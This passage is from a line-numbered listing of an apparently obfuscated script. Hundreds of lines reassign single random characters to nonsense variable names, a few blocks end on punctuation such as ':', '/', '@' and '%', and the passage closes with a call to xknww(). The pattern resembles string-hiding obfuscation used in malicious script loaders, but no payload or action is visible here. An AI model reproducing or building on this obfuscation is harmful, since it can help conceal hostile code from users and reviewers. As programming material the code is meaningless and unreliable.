790 | kvxppc = "z"; | |
791 | kvxppc = "N"; | |
792 | kvxppc = "G"; | |
793 | kvxppc = "V"; | |
794 | kvxppc = "v"; | |
795 | kvxppc = "w"; | |
796 | kvxppc = "H"; | |
797 | kvxppc = "e"; | |
798 | kvxppc = "p"; | |
799 | kvxppc = "Q"; | |
800 | kvxppc = "u"; | |
801 | kvxppc = "L"; | |
802 | kvxppc = "a"; | |
803 | kvxppc = "q"; | |
804 | kvxppc = "X"; | |
805 | kvxppc = "o"; | |
806 | kvxppc = "z"; | |
807 | kvxppc = "C"; | |
808 | kvxppc = "w"; | |
809 | kvxppc = "R"; | |
810 | kvxppc = "N"; | |
811 | kvxppc = "T"; | |
812 | kvxppc = "R"; | |
813 | kvxppc = "Q"; | |
814 | kvxppc = "n"; | |
815 | kvxppc = "l"; | |
816 | kvxppc = "g"; | |
817 | sdvkziw = "S"; | |
818 | sdvkziw = "W"; | |
819 | sdvkziw = "n"; | |
820 | sdvkziw = "p"; | |
821 | sdvkziw = "e"; | |
822 | sdvkziw = "Q"; | |
823 | sdvkziw = "Q"; | |
824 | sdvkziw = "v"; | |
825 | sdvkziw = "b"; | |
826 | sdvkziw = "A"; | |
827 | sdvkziw = "q"; | |
828 | sdvkziw = "j"; | |
829 | sdvkziw = "G"; | |
830 | sdvkziw = "M"; | |
831 | sdvkziw = "L"; | |
832 | sdvkziw = "i"; | |
833 | sdvkziw = "b"; | |
834 | sdvkziw = "w"; | |
835 | sdvkziw = "r"; | |
836 | sdvkziw = "l"; | |
837 | sdvkziw = "s"; | |
838 | sdvkziw = "R"; | |
839 | sdvkziw = "B"; | |
840 | sdvkziw = "w"; | |
841 | xfdgno = "k"; | |
842 | xfdgno = "K"; | |
843 | xfdgno = "C"; | |
844 | xfdgno = "O"; | |
845 | xfdgno = "g"; | |
846 | xfdgno = "l"; | |
847 | xfdgno = "g"; | |
848 | xfdgno = "f"; | |
849 | xfdgno = "d"; | |
850 | etlxskmah = "T"; | |
851 | etlxskmah = "z"; | |
852 | etlxskmah = "e"; | |
853 | etlxskmah = "D"; | |
854 | etlxskmah = "o"; | |
855 | etlxskmah = "O"; | |
856 | etlxskmah = "w"; | |
857 | etlxskmah = "e"; | |
858 | etlxskmah = "J"; | |
859 | etlxskmah = "p"; | |
860 | etlxskmah = "P"; | |
861 | etlxskmah = "o"; | |
862 | etlxskmah = "i"; | |
863 | etlxskmah = "Q"; | |
864 | etlxskmah = "E"; | |
865 | etlxskmah = "o"; | |
866 | etlxskmah = "c"; | |
867 | etlxskmah = "M"; | |
868 | etlxskmah = "I"; | |
869 | etlxskmah = "z"; | |
870 | etlxskmah = "a"; | |
871 | etlxskmah = "E"; | |
872 | etlxskmah = "L"; | |
873 | etlxskmah = "W"; | |
874 | etlxskmah = "e"; | |
875 | etlxskmah = "x"; | |
876 | etlxskmah = "L"; | |
877 | etlxskmah = "A"; | |
878 | etlxskmah = "W"; | |
879 | etlxskmah = "s"; | |
880 | etlxskmah = "Y"; | |
881 | etlxskmah = "F"; | |
882 | etlxskmah = "E"; | |
883 | etlxskmah = "I"; | |
884 | etlxskmah = "n"; | |
885 | jemzwy = "L"; | |
886 | jemzwy = "i"; | |
887 | jemzwy = "b"; | |
888 | jemzwy = "Y"; | |
889 | jemzwy = "N"; | |
890 | jemzwy = "Y"; | |
891 | jemzwy = "J"; | |
892 | jemzwy = "R"; | |
893 | jemzwy = "M"; | |
894 | jemzwy = "R"; | |
895 | jemzwy = "O"; | |
896 | jemzwy = "j"; | |
897 | jemzwy = "H"; | |
898 | jemzwy = "C"; | |
899 | jemzwy = "x"; | |
900 | jemzwy = "p"; | |
901 | jemzwy = "H"; | |
902 | jemzwy = "x"; | |
903 | jemzwy = "m"; | |
904 | jemzwy = "U"; | |
905 | jemzwy = "t"; | |
906 | mgcxx = "A"; | |
907 | mgcxx = "u"; | |
908 | mgcxx = "r"; | |
909 | mgcxx = "u"; | |
910 | mgcxx = "i"; | |
911 | mgcxx = "j"; | |
912 | mgcxx = "F"; | |
913 | mgcxx = "i"; | |
914 | mgcxx = "i"; | |
915 | mgcxx = "a"; | |
916 | mgcxx = "A"; | |
917 | mgcxx = "d"; | |
918 | mgcxx = "E"; | |
919 | mgcxx = "a"; | |
920 | mgcxx = "A"; | |
921 | mgcxx = "J"; | |
922 | mgcxx = "S"; | |
923 | mgcxx = "y"; | |
924 | mgcxx = "r"; | |
925 | mgcxx = "H"; | |
926 | mgcxx = "y"; | |
927 | mgcxx = "e"; | |
928 | mgcxx = "E"; | |
929 | mgcxx = "B"; | |
930 | mgcxx = "t"; | |
931 | mgcxx = "l"; | |
932 | mgcxx = "q"; | |
933 | mgcxx = "U"; | |
934 | mgcxx = "E"; | |
935 | mgcxx = "m"; | |
936 | mgcxx = "E"; | |
937 | mgcxx = "c"; | |
938 | mgcxx = "u"; | |
939 | mgcxx = "X"; | |
940 | mgcxx = "v"; | |
941 | vdrzi = "c"; | |
942 | vdrzi = "e"; | |
943 | vdrzi = "A"; | |
944 | vdrzi = "a"; | |
945 | vdrzi = "D"; | |
946 | vdrzi = ":"; | |
947 | xpvqlujub = "o"; | |
948 | xpvqlujub = "A"; | |
949 | xpvqlujub = "o"; | |
950 | xpvqlujub = "S"; | |
951 | xpvqlujub = "r"; | |
952 | xpvqlujub = "s"; | |
953 | xpvqlujub = "f"; | |
954 | xpvqlujub = "R"; | |
955 | xpvqlujub = "q"; | |
956 | xpvqlujub = "Z"; | |
957 | xpvqlujub = "z"; | |
958 | xpvqlujub = "D"; | |
959 | xpvqlujub = "y"; | |
960 | xpvqlujub = "s"; | |
961 | xpvqlujub = "B"; | |
962 | xpvqlujub = "i"; | |
963 | xpvqlujub = "Q"; | |
964 | xpvqlujub = "D"; | |
965 | xpvqlujub = "U"; | |
966 | xpvqlujub = "K"; | |
967 | xpvqlujub = "v"; | |
968 | xpvqlujub = "W"; | |
969 | xpvqlujub = "q"; | |
970 | xpvqlujub = "g"; | |
971 | xpvqlujub = "c"; | |
972 | xpvqlujub = "F"; | |
973 | xpvqlujub = "e"; | |
974 | xpvqlujub = "P"; | |
975 | jogymyo = "m"; | |
976 | jogymyo = "A"; | |
977 | jogymyo = "s"; | |
978 | jogymyo = "N"; | |
979 | jogymyo = "s"; | |
980 | jogymyo = "h"; | |
981 | jogymyo = "U"; | |
982 | jogymyo = "Z"; | |
983 | jogymyo = "k"; | |
984 | jogymyo = "p"; | |
985 | jogymyo = "l"; | |
986 | jogymyo = "Y"; | |
987 | jogymyo = "a"; | |
988 | jogymyo = "W"; | |
989 | jogymyo = "C"; | |
990 | jogymyo = "O"; | |
991 | jogymyo = "T"; | |
992 | qqqadzy = "l"; | |
993 | qqqadzy = "i"; | |
994 | qqqadzy = "j"; | |
995 | qqqadzy = "D"; | |
996 | qqqadzy = "Z"; | |
997 | qqqadzy = "S"; | |
998 | qqqadzy = "v"; | |
999 | qqqadzy = "L"; | |
1000 | qqqadzy = "b"; | |
1001 | qqqadzy = "C"; | |
1002 | qqqadzy = "i"; | |
1003 | qqqadzy = "U"; | |
1004 | qqqadzy = "z"; | |
1005 | qqqadzy = "Q"; | |
1006 | qqqadzy = "P"; | |
1007 | qqqadzy = "v"; | |
1008 | qqqadzy = "Z"; | |
1009 | qqqadzy = "O"; | |
1010 | qqqadzy = "R"; | |
1011 | qqqadzy = "T"; | |
1012 | qqqadzy = "T"; | |
1013 | qqqadzy = "d"; | |
1014 | qqqadzy = "R"; | |
1015 | qqqadzy = "l"; | |
1016 | qqqadzy = "v"; | |
1017 | qqqadzy = "J"; | |
1018 | qqqadzy = "f"; | |
1019 | qqqadzy = "r"; | |
1020 | qqqadzy = "V"; | |
1021 | qqqadzy = "l"; | |
1022 | qqqadzy = "y"; | |
1023 | qqqadzy = "u"; | |
1024 | qqqadzy = "I"; | |
1025 | qqqadzy = "\\"; | |
1026 | qpezqz = "u"; | |
1027 | qpezqz = "N"; | |
1028 | qpezqz = "A"; | |
1029 | qpezqz = "I"; | |
1030 | qpezqz = "P"; | |
1031 | qpezqz = "u"; | |
1032 | qpezqz = "R"; | |
1033 | qpezqz = "g"; | |
1034 | qpezqz = "f"; | |
1035 | qpezqz = "B"; | |
1036 | qpezqz = "a"; | |
1037 | qpezqz = "f"; | |
1038 | qpezqz = "r"; | |
1039 | qpezqz = "Q"; | |
1040 | qpezqz = "Y"; | |
1041 | qpezqz = "g"; | |
1042 | qpezqz = "e"; | |
1043 | qpezqz = "j"; | |
1044 | qpezqz = "d"; | |
1045 | qpezqz = "h"; | |
1046 | qpezqz = "i"; | |
1047 | qpezqz = "P"; | |
1048 | qpezqz = "t"; | |
1049 | qpezqz = "J"; | |
1050 | qpezqz = "O"; | |
1051 | dlzswfgs = "S"; | |
1052 | dlzswfgs = "C"; | |
1053 | dlzswfgs = "o"; | |
1054 | dlzswfgs = "Z"; | |
1055 | dlzswfgs = "h"; | |
1056 | dlzswfgs = "n"; | |
1057 | dlzswfgs = "t"; | |
1058 | dlzswfgs = "K"; | |
1059 | dlzswfgs = "Z"; | |
1060 | dlzswfgs = "K"; | |
1061 | dlzswfgs = "N"; | |
1062 | dlzswfgs = "l"; | |
1063 | dlzswfgs = "R"; | |
1064 | dlzswfgs = "w"; | |
1065 | dlzswfgs = "A"; | |
1066 | dlzswfgs = "X"; | |
1067 | dlzswfgs = "Q"; | |
1068 | dlzswfgs = "V"; | |
1069 | dlzswfgs = "P"; | |
1070 | dlzswfgs = "r"; | |
1071 | dlzswfgs = "P"; | |
1072 | dlzswfgs = "d"; | |
1073 | dlzswfgs = "I"; | |
1074 | dlzswfgs = "X"; | |
1075 | dlzswfgs = "v"; | |
1076 | dlzswfgs = "T"; | |
1077 | dlzswfgs = "x"; | |
1078 | dlzswfgs = "l"; | |
1079 | dlzswfgs = "x"; | |
1080 | dlzswfgs = "E"; | |
1081 | dlzswfgs = "h"; | |
1082 | dlzswfgs = "4"; | |
1083 | nzbrxkfj = "E"; | |
1084 | nzbrxkfj = "p"; | |
1085 | nzbrxkfj = "z"; | |
1086 | nzbrxkfj = "e"; | |
1087 | nzbrxkfj = "C"; | |
1088 | nzbrxkfj = "i"; | |
1089 | nzbrxkfj = "z"; | |
1090 | nzbrxkfj = "d"; | |
1091 | nzbrxkfj = "a"; | |
1092 | nzbrxkfj = "k"; | |
1093 | nzbrxkfj = "g"; | |
1094 | nzbrxkfj = "T"; | |
1095 | nzbrxkfj = "Y"; | |
1096 | nzbrxkfj = "M"; | |
1097 | nzbrxkfj = "j"; | |
1098 | nzbrxkfj = "W"; | |
1099 | nzbrxkfj = "u"; | |
1100 | nzbrxkfj = "X"; | |
1101 | nzbrxkfj = "f"; | |
1102 | nzbrxkfj = "z"; | |
1103 | nzbrxkfj = "R"; | |
1104 | nzbrxkfj = "J"; | |
1105 | nzbrxkfj = "N"; | |
1106 | nzbrxkfj = "a"; | |
1107 | nzbrxkfj = "g"; | |
1108 | nzbrxkfj = "O"; | |
1109 | nzbrxkfj = "b"; | |
1110 | nzbrxkfj = "M"; | |
1111 | nzbrxkfj = "W"; | |
1112 | nzbrxkfj = "M"; | |
1113 | nzbrxkfj = "T"; | |
1114 | nzbrxkfj = "C"; | |
1115 | nzbrxkfj = "X"; | |
1116 | nzbrxkfj = "R"; | |
1117 | nzbrxkfj = "W"; | |
1118 | nzbrxkfj = "o"; | |
1119 | nzbrxkfj = "Y"; | |
1120 | nzbrxkfj = "h"; | |
1121 | nzbrxkfj = "q"; | |
1122 | nzbrxkfj = "R"; | |
1123 | nzbrxkfj = "D"; | |
1124 | nzbrxkfj = "u"; | |
1125 | nzbrxkfj = "a"; | |
1126 | nzbrxkfj = "H"; | |
1127 | nzbrxkfj = "/"; | |
1128 | qtekmfvx = "i"; | |
1129 | qtekmfvx = "I"; | |
1130 | qtekmfvx = "N"; | |
1131 | qtekmfvx = "S"; | |
1132 | qtekmfvx = "P"; | |
1133 | qtekmfvx = "H"; | |
1134 | qtekmfvx = "Z"; | |
1135 | qtekmfvx = "S"; | |
1136 | qtekmfvx = "i"; | |
1137 | qtekmfvx = "f"; | |
1138 | qtekmfvx = "u"; | |
1139 | qtekmfvx = "n"; | |
1140 | qtekmfvx = "X"; | |
1141 | qtekmfvx = "v"; | |
1142 | qtekmfvx = "B"; | |
1143 | qtekmfvx = "R"; | |
1144 | qtekmfvx = "T"; | |
1145 | qtekmfvx = "C"; | |
1146 | qtekmfvx = "Z"; | |
1147 | qtekmfvx = "z"; | |
1148 | qtekmfvx = "o"; | |
1149 | qtekmfvx = "l"; | |
1150 | qtekmfvx = "w"; | |
1151 | qtekmfvx = "W"; | |
1152 | qtekmfvx = "j"; | |
1153 | qtekmfvx = "x"; | |
1154 | qtekmfvx = "J"; | |
1155 | qtekmfvx = "a"; | |
1156 | gtgsda = "s"; | |
1157 | gtgsda = "I"; | |
1158 | gtgsda = "i"; | |
1159 | gtgsda = "m"; | |
1160 | gtgsda = "i"; | |
1161 | gtgsda = "H"; | |
1162 | gtgsda = "y"; | |
1163 | gtgsda = "g"; | |
1164 | gtgsda = "N"; | |
1165 | tylyamqt = "T"; | |
1166 | tylyamqt = "L"; | |
1167 | tylyamqt = "w"; | |
1168 | tylyamqt = "t"; | |
1169 | tylyamqt = "x"; | |
1170 | tylyamqt = "H"; | |
1171 | tylyamqt = "w"; | |
1172 | tylyamqt = "P"; | |
1173 | tylyamqt = "N"; | |
1174 | tylyamqt = "X"; | |
1175 | tylyamqt = "Z"; | |
1176 | tylyamqt = "d"; | |
1177 | tylyamqt = "P"; | |
1178 | tylyamqt = "x"; | |
1179 | tylyamqt = "d"; | |
1180 | tylyamqt = "a"; | |
1181 | tylyamqt = "p"; | |
1182 | tylyamqt = "z"; | |
1183 | tylyamqt = "Y"; | |
1184 | tylyamqt = "v"; | |
1185 | tylyamqt = "i"; | |
1186 | tylyamqt = "O"; | |
1187 | tylyamqt = "w"; | |
1188 | tylyamqt = "P"; | |
1189 | tylyamqt = "@"; | |
1190 | zcmygv = "K"; | |
1191 | zcmygv = "y"; | |
1192 | zcmygv = "t"; | |
1193 | zcmygv = "W"; | |
1194 | zcmygv = "K"; | |
1195 | zcmygv = "M"; | |
1196 | zcmygv = "S"; | |
1197 | zcmygv = "C"; | |
1198 | zcmygv = "x"; | |
1199 | zcmygv = "e"; | |
1200 | zcmygv = "Z"; | |
1201 | zcmygv = "e"; | |
1202 | zcmygv = "N"; | |
1203 | zcmygv = "J"; | |
1204 | zcmygv = "Z"; | |
1205 | zcmygv = "W"; | |
1206 | zcmygv = "l"; | |
1207 | zcmygv = "Q"; | |
1208 | zcmygv = "G"; | |
1209 | zcmygv = "v"; | |
1210 | zcmygv = "N"; | |
1211 | zcmygv = "Z"; | |
1212 | zcmygv = "o"; | |
1213 | zcmygv = "m"; | |
1214 | zcmygv = "b"; | |
1215 | zcmygv = "f"; | |
1216 | zcmygv = "n"; | |
1217 | zcmygv = "h"; | |
1218 | zcmygv = "O"; | |
1219 | zcmygv = "r"; | |
1220 | zcmygv = "V"; | |
1221 | zcmygv = "v"; | |
1222 | zcmygv = "p"; | |
1223 | zcmygv = "z"; | |
1224 | zcmygv = "q"; | |
1225 | zcmygv = "X"; | |
1226 | zcmygv = "s"; | |
1227 | zcmygv = "V"; | |
1228 | zcmygv = "o"; | |
1229 | zcmygv = "e"; | |
1230 | zcmygv = "c"; | |
1231 | zcmygv = "g"; | |
1232 | zcmygv = "q"; | |
1233 | zcmygv = "w"; | |
1234 | zcmygv = "l"; | |
1235 | bgduqf = "n"; | |
1236 | bgduqf = "Y"; | |
1237 | bgduqf = "x"; | |
1238 | bgduqf = "z"; | |
1239 | bgduqf = "h"; | |
1240 | bgduqf = "T"; | |
1241 | bgduqf = "N"; | |
1242 | bgduqf = "Q"; | |
1243 | bgduqf = "g"; | |
1244 | bgduqf = "f"; | |
1245 | bgduqf = "O"; | |
1246 | bgduqf = "J"; | |
1247 | bgduqf = "P"; | |
1248 | bgduqf = "h"; | |
1249 | bgduqf = "p"; | |
1250 | bgduqf = "n"; | |
1251 | bgduqf = "D"; | |
1252 | bgduqf = "x"; | |
1253 | bgduqf = "T"; | |
1254 | bgduqf = "R"; | |
1255 | bgduqf = "e"; | |
1256 | bgduqf = "K"; | |
1257 | bgduqf = "x"; | |
1258 | bgduqf = "p"; | |
1259 | bgduqf = "r"; | |
1260 | bgduqf = "l"; | |
1261 | bgduqf = "W"; | |
1262 | bgduqf = "P"; | |
1263 | bgduqf = "w"; | |
1264 | bgduqf = "R"; | |
1265 | bgduqf = "H"; | |
1266 | ervwmjiml = "y"; | |
1267 | ervwmjiml = "e"; | |
1268 | ervwmjiml = "V"; | |
1269 | ervwmjiml = "T"; | |
1270 | ervwmjiml = "a"; | |
1271 | ervwmjiml = "A"; | |
1272 | ervwmjiml = "j"; | |
1273 | ervwmjiml = "w"; | |
1274 | ervwmjiml = "O"; | |
1275 | ervwmjiml = "E"; | |
1276 | ervwmjiml = "b"; | |
1277 | ervwmjiml = "l"; | |
1278 | ervwmjiml = "X"; | |
1279 | ervwmjiml = "x"; | |
1280 | ervwmjiml = "h"; | |
1281 | ervwmjiml = "b"; | |
1282 | ervwmjiml = "l"; | |
1283 | ervwmjiml = "Z"; | |
1284 | ervwmjiml = "E"; | |
1285 | ervwmjiml = "V"; | |
1286 | ervwmjiml = "W"; | |
1287 | ervwmjiml = "w"; | |
1288 | ervwmjiml = "o"; | |
1289 | ervwmjiml = "p"; | |
1290 | ervwmjiml = "d"; | |
1291 | ervwmjiml = "C"; | |
1292 | ervwmjiml = "-"; | |
1293 | fsbocb = "E"; | |
1294 | fsbocb = "k"; | |
1295 | fsbocb = "B"; | |
1296 | fsbocb = "H"; | |
1297 | fsbocb = "j"; | |
1298 | cclovkiow = "I"; | |
1299 | cclovkiow = "E"; | |
1300 | cclovkiow = "h"; | |
1301 | cclovkiow = "j"; | |
1302 | cclovkiow = "Z"; | |
1303 | cclovkiow = "b"; | |
1304 | cclovkiow = "q"; | |
1305 | cclovkiow = "N"; | |
1306 | cclovkiow = "h"; | |
1307 | cclovkiow = "R"; | |
1308 | cclovkiow = "n"; | |
1309 | cclovkiow = "K"; | |
1310 | cclovkiow = "c"; | |
1311 | cclovkiow = "S"; | |
1312 | cclovkiow = "g"; | |
1313 | cclovkiow = "a"; | |
1314 | cclovkiow = "L"; | |
1315 | cclovkiow = "f"; | |
1316 | cclovkiow = "I"; | |
1317 | cclovkiow = "W"; | |
1318 | cclovkiow = "c"; | |
1319 | cclovkiow = "Y"; | |
1320 | cclovkiow = "Y"; | |
1321 | cclovkiow = "O"; | |
1322 | cclovkiow = "r"; | |
1323 | cclovkiow = "o"; | |
1324 | cclovkiow = "Q"; | |
1325 | cclovkiow = "D"; | |
1326 | cclovkiow = "I"; | |
1327 | cclovkiow = "V"; | |
1328 | cclovkiow = "m"; | |
1329 | cclovkiow = "L"; | |
1330 | cclovkiow = "l"; | |
1331 | cclovkiow = "r"; | |
1332 | cclovkiow = "Y"; | |
1333 | ngjda = "L"; | |
1334 | ngjda = "W"; | |
1335 | ngjda = "k"; | |
1336 | ngjda = "l"; | |
1337 | ngjda = "O"; | |
1338 | ngjda = "v"; | |
1339 | ngjda = "Z"; | |
1340 | ngjda = "U"; | |
1341 | ngjda = "C"; | |
1342 | ngjda = "A"; | |
1343 | ngjda = "K"; | |
1344 | ngjda = "L"; | |
1345 | ngjda = "E"; | |
1346 | ngjda = "V"; | |
1347 | ngjda = "G"; | |
1348 | ngjda = "F"; | |
1349 | ngjda = "V"; | |
1350 | ngjda = "c"; | |
1351 | ngjda = "p"; | |
1352 | ngjda = "q"; | |
1353 | ngjda = "V"; | |
1354 | ngjda = "L"; | |
1355 | ngjda = "u"; | |
1356 | ngjda = "H"; | |
1357 | ngjda = "i"; | |
1358 | ngjda = "Z"; | |
1359 | ngjda = "L"; | |
1360 | ngjda = "j"; | |
1361 | ngjda = "l"; | |
1362 | ngjda = "b"; | |
1363 | ngjda = "9"; | |
1364 | ashymektd = "I"; | |
1365 | ashymektd = "b"; | |
1366 | ashymektd = "v"; | |
1367 | ashymektd = "f"; | |
1368 | ashymektd = "p"; | |
1369 | ashymektd = "n"; | |
1370 | ashymektd = "g"; | |
1371 | ashymektd = "K"; | |
1372 | ashymektd = "h"; | |
1373 | ashymektd = "H"; | |
1374 | ashymektd = "l"; | |
1375 | ashymektd = "Y"; | |
1376 | ashymektd = "U"; | |
1377 | ashymektd = "C"; | |
1378 | ashymektd = "c"; | |
1379 | ashymektd = "g"; | |
1380 | ashymektd = "r"; | |
1381 | ashymektd = "a"; | |
1382 | ashymektd = "k"; | |
1383 | ashymektd = "z"; | |
1384 | ashymektd = "y"; | |
1385 | ashymektd = "I"; | |
1386 | ashymektd = "r"; | |
1387 | ashymektd = "l"; | |
1388 | ashymektd = "w"; | |
1389 | ashymektd = "u"; | |
1390 | ashymektd = "5"; | |
1391 | dmshjh = "K"; | |
1392 | dmshjh = "f"; | |
1393 | dmshjh = "Y"; | |
1394 | dmshjh = "X"; | |
1395 | dmshjh = "q"; | |
1396 | dmshjh = "t"; | |
1397 | dmshjh = "u"; | |
1398 | dmshjh = "b"; | |
1399 | cvgsx = "S"; | |
1400 | cvgsx = "d"; | |
1401 | cvgsx = "N"; | |
1402 | cvgsx = "E"; | |
1403 | cvgsx = "m"; | |
1404 | cvgsx = "c"; | |
1405 | cvgsx = "b"; | |
1406 | cvgsx = "J"; | |
1407 | cvgsx = "x"; | |
1408 | cvgsx = "G"; | |
1409 | cvgsx = "t"; | |
1410 | cvgsx = "c"; | |
1411 | cvgsx = "L"; | |
1412 | cvgsx = "W"; | |
1413 | cvgsx = "T"; | |
1414 | cvgsx = "d"; | |
1415 | cvgsx = "d"; | |
1416 | cvgsx = "l"; | |
1417 | cvgsx = "u"; | |
1418 | cvgsx = "x"; | |
1419 | cvgsx = "O"; | |
1420 | cvgsx = "y"; | |
1421 | cvgsx = "y"; | |
1422 | cvgsx = "N"; | |
1423 | cvgsx = "p"; | |
1424 | cvgsx = "U"; | |
1425 | cvgsx = "Z"; | |
1426 | cvgsx = "g"; | |
1427 | cvgsx = "j"; | |
1428 | cvgsx = "l"; | |
1429 | cvgsx = "m"; | |
1430 | cvgsx = "j"; | |
1431 | cvgsx = "u"; | |
1432 | cvgsx = "."; | |
1433 | aiyudwexx = "M"; | |
1434 | aiyudwexx = "h"; | |
1435 | aiyudwexx = "t"; | |
1436 | aiyudwexx = "Q"; | |
1437 | aiyudwexx = "f"; | |
1438 | aiyudwexx = "x"; | |
1439 | aiyudwexx = "C"; | |
1440 | aiyudwexx = "D"; | |
1441 | aiyudwexx = "T"; | |
1442 | aiyudwexx = "v"; | |
1443 | aiyudwexx = "I"; | |
1444 | aiyudwexx = "z"; | |
1445 | aiyudwexx = "S"; | |
1446 | aiyudwexx = "H"; | |
1447 | aiyudwexx = "A"; | |
1448 | aiyudwexx = "P"; | |
1449 | aiyudwexx = "b"; | |
1450 | aiyudwexx = "e"; | |
1451 | aiyudwexx = "L"; | |
1452 | aiyudwexx = "v"; | |
1453 | aiyudwexx = "A"; | |
1454 | aiyudwexx = "w"; | |
1455 | aiyudwexx = "c"; | |
1456 | aiyudwexx = "g"; | |
1457 | aiyudwexx = "Q"; | |
1458 | sebpb = "q"; | |
1459 | sebpb = "g"; | |
1460 | sebpb = "G"; | |
1461 | sebpb = "s"; | |
1462 | sebpb = "Y"; | |
1463 | sebpb = "S"; | |
1464 | ticrmoynt = "Z"; | |
1465 | ticrmoynt = "F"; | |
1466 | ticrmoynt = "Z"; | |
1467 | ticrmoynt = "m"; | |
1468 | ticrmoynt = "c"; | |
1469 | ticrmoynt = "Y"; | |
1470 | ticrmoynt = "Z"; | |
1471 | ticrmoynt = "u"; | |
1472 | ticrmoynt = "x"; | |
1473 | ticrmoynt = "k"; | |
1474 | ticrmoynt = "F"; | |
1475 | ticrmoynt = "W"; | |
1476 | qkxcud = "U"; | |
1477 | qkxcud = "U"; | |
1478 | qkxcud = "l"; | |
1479 | qkxcud = "Z"; | |
1480 | qkxcud = "W"; | |
1481 | qkxcud = "e"; | |
1482 | qkxcud = "N"; | |
1483 | qkxcud = "q"; | |
1484 | qkxcud = "s"; | |
1485 | qkxcud = "e"; | |
1486 | qkxcud = "E"; | |
1487 | qkxcud = "w"; | |
1488 | qkxcud = "O"; | |
1489 | qkxcud = "A"; | |
1490 | qkxcud = "z"; | |
1491 | qkxcud = "s"; | |
1492 | qkxcud = "p"; | |
1493 | qkxcud = "e"; | |
1494 | qkxcud = "j"; | |
1495 | qkxcud = "x"; | |
1496 | qkxcud = "I"; | |
1497 | qkxcud = "i"; | |
1498 | qkxcud = "V"; | |
1499 | qkxcud = "o"; | |
1500 | qkxcud = "R"; | |
1501 | qkxcud = "X"; | |
1502 | qkxcud = "U"; | |
1503 | qkxcud = "L"; | |
1504 | qkxcud = "S"; | |
1505 | qkxcud = "H"; | |
1506 | qkxcud = "D"; | |
1507 | qkxcud = "Z"; | |
1508 | qkxcud = "n"; | |
1509 | qkxcud = "%"; | |
1510 | seccv = "G"; | |
1511 | seccv = "c"; | |
1512 | seccv = "P"; | |
1513 | seccv = "P"; | |
1514 | seccv = "r"; | |
1515 | seccv = "O"; | |
1516 | seccv = "d"; | |
1517 | seccv = "J"; | |
1518 | seccv = "s"; | |
1519 | seccv = "g"; | |
1520 | seccv = "x"; | |
1521 | seccv = "S"; | |
1522 | seccv = "j"; | |
1523 | seccv = "j"; | |
1524 | seccv = "t"; | |
1525 | seccv = "3"; | |
1526 | xknww ( ); |
|